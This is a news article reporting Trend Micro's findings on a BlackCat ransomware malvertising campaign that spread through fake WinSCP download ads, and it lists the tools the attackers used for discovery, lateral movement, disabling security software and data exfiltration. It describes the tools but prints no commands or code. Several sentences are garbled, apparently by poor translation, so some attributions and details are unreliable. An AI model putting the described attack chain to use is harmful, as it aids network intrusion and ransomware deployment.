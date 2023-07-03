



Ransomware group BlackCat (also known as ALPHV) is using Google and Bing search ads promoting a popular file transfer app as a decoy to drop malicious payloads and infect corporate networks with malware .

This malvertising campaign redirects those who click on malicious ads to a fake WinSCP download page. WinSCP is a popular open source Windows application used to copy files between local computers and remote servers using various transfer protocols.

Trend Micro researchers Lucas Silva, Ronjay Caraguey, Arianne Della Cruz, and Gabriel Cardoso wrote in a June 30 investigative report that Trend Micro has targeted victims compromised through the campaign. Outlined how they worked together.

This report covers the range of Tools, Techniques, and Procedures (TTPs) deployed during the attack, including legitimate and illegal tools, scripts, and commands, and how a separate investigation identified similar TTPs leading to BlackCat infections. Describes what you have identified.

In the first case, the threat actors were successfully removed from the victim’s network, but before that they obtained and abused top-level administrative privileges to attempt to establish persistence, and AnyDesk Used remote administration tools such as .NET to gain backdoor access to the network. The attacker then stole the password and attempted to access her backup server.

The researchers found that if later intervention were called for, the enterprise could be exposed to the attack, especially since the threat actor had already successfully gained initial access to domain administrator privileges and had begun establishing backdoors and persistence. He said it was very likely that he had been greatly affected.

How advertising led to infringement

WinSCP is a useful tool for IT professionals, especially system administrators and web administrators, and is ideal for attracting victims with access to the types of corporate networks BlackCat targets.

The infection begins when the user searches for WinSCP Download on the Bing search engine. Malicious ads of WinSCP application appear above organic search results. According to the researchers, the ad is directed to a suspicious website containing a tutorial on how to use WinSCP to automate file transfers.

The user is then directed to a cloned WinSCP download web page at winsccp.[.]com is an address similar to the legitimate WinSCP site, winscp.net, which offers to download a malicious ISO file.

The ISO contains setup.exe, a renamed msiexec.exe executable, msi.dll, a delay-loading DLL that acts as a dropper for the actual WinSCP installer, and a malicious Python execution environment that downloads the Cobalt Strike beacon. contains two files.

attacker’s toolkit

Cobalt Strike is a red team penetration testing tool used in attack simulations. Cracked versions of tools are becoming increasingly popular among attackers.

Other tools used in the attack included AdFind, which is used to retrieve and display information from your Active Directory environment. In the hands of an attacker, AdFind can be used to enumerate a user’s accounts, escalate privileges, and even extract hashes of her passwords, according to a Trend Micro report.

We also observed that the attacker was using AccessChk64. AccessChk64 is a command line tool developed by Sysinternals that is primarily used to check the security rights and permissions of objects within Windows. In this case, it’s not clear what the threat actor would use this tool for, but it’s not just for privilege escalation and identifying files, but also for understanding what permissions have been assigned to users and groups. Note that you can also use , services with weak access control settings.

The attackers used the Windows command line tool findstr to search for specific strings in XML files on compromised systems.

The purpose of this command could be to identify an XML file containing the string cpassword. The researchers say this is interesting from a security perspective, as cpassword is associated with a deprecated method of storing passwords in Group Policy settings within AD.

PowerShell was used to run scripts including PowerView, part of the PowerSploit collection of penetration testing scripts used by threat actors to gather information about their Active Directory environment.

The command line tools PsExec, BitsAdmin and curl were used to download additional tools and move laterally through the environment.

The KillAV BAT script was used in an unsuccessful attempt to disable or bypass any antivirus or antimalware programs installed on the system. The attacker installed AnyDesk to maintain persistence.

A similar TTP refers to BlackCat

In subsequent Trend Micro investigations, similar TTPs led to the identification of BlackCat infections and additional tools were also used, the researchers said.

As with the other types of malware and tools previously mentioned, we were able to identify that the antivirus or endpoint detection and response (EDR) SpyBoy Terminator was being used to tamper with the protection provided by the agent. they are writing

To extract customer data, the attackers used the PuTTY Secure Copy client (PSCP) to transfer the collected information. Upon investigating his one of the C&C (command and control) domains used by the attackers behind this infection, we also discovered her Cl0p ransomware file which may be related. (The Clop ransomware group is responsible for the recent MOVEit Transfer attack.)

A Twitter user posted that a similar TTP malvertising campaign used AnyDesk ads instead of WinSCP as a lure.

Trend Micro has published known indicators of compromise from this attack.

In recent years, attackers have become increasingly adept at exploiting vulnerabilities that victims themselves are unaware of, leading organizations to adopt unpredictable behavior, the researchers write.

In addition to ongoing efforts to prevent unauthorized access, early detection and response within organizational networks is critical. Rapid remediation is also essential, as delayed response times can lead to significant damage.

